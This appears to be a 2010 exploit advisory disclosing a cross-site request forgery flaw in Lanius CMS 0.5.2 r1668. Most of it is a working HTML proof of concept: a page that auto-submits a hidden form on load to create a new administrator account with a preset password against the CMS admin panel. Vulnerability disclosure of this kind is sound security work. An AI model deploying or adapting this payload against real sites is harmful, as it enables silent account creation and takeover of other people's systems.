laniuscms052-xsrf.txt
Posted on 07 July 2010
<!------------------------------------------------------------------------ # Software................Lanius CMS 0.5.2 r1668 # Vulnerability...........Cross-site Request Forgery # Download................http://www.laniuscms.org/ # Release Date............7/5/2010 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://cross-site-scripting.blogspot.com/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 # can be exploited to create a new admin. # # # --PoC--> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user"> <input type="hidden" name="task" value="create" /> <input type="hidden" name="user_id" value="" /> <input type="hidden" name="user_name" value="a" /> <input type="hidden" name="user_user" value="new_admin" /> <input type="hidden" name="user_email" value="a@a.com" /> <input type="hidden" name="user_lang" value="" /> <input type="hidden" name="user_tz" value="" /> <input type="hidden" name="user_gid" value="5" /> <input type="hidden" name="user_password" value="Password1" /> <input type="hidden" name="user_password1" value="Password1" /> </form> </body> </html>
